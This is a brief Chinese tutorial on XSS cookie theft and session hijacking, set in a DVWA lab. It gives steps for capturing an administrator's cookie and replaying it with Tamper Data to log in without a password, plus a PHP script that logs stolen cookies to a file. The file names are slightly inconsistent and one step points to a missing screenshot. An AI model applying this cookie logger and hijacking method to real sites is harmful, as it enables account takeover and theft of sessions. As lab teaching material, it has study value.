xss获取cookie的方法

xss获取cookie简单步骤如下：

1、在存在漏洞的论坛中发日志。

2、然后以管理远登陆，进入后页面会跳转，此时cookie就发送到你的服务器下的code.txt文件中了。

3、这是没有账户前的登陆界面。

4、打开firefox的Tamper Data插件，点击Start Tamper开始抓取信息，刷新登陆界面，然后会跳出对话框，点击Tamper按钮，在途中的cookie一栏中替换掉你抓取到的cookie，单击确定发送请求数据，xss获取cookie

5、替换cookie后不用输用户名密码就顺利进入管理员账户了。

xss获取cookie实验环境：

• PHPstudy
• 火狐浏览器、IE
• DVWA靶场

xss获取cookie实验准备：

在www目录下创建一个名为1.php的文件,内容如下：

<?php
$file = fopen("1.txt","a");
if($_GET['cookie']){
$cookie = $_GET['cookie'];
fputs ($file,"$cookie\n");
}
?>